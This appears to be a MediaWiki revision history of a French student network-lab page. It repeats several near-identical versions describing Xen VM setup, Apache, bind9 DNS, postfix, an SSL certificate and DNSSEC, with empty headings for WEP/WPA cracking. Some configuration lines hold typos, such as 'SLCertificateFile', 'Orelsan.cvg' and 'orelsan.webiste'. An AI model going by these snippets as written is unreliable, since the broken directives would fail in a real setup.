| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
=== Cassage de clé WEP ===<br />
=== Cassage de clé WPA-PSK ===</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35644TP sysres IMA2a5 2016/2017 G42016-12-06T09:19:10Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
<b> DNSSEC </b><br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé WEP ==<br />
<br />
== Cassage clé WPA-PSK ==</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35643TP sysres IMA2a5 2016/2017 G42016-12-06T09:15:47Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
<b>Installation boite mail</b><br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
<b>Générer une demande de certificat en SHA 2</b><br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
<b> DNSSEC </b><br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35642TP sysres IMA2a5 2016/2017 G42016-12-06T09:09:59Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
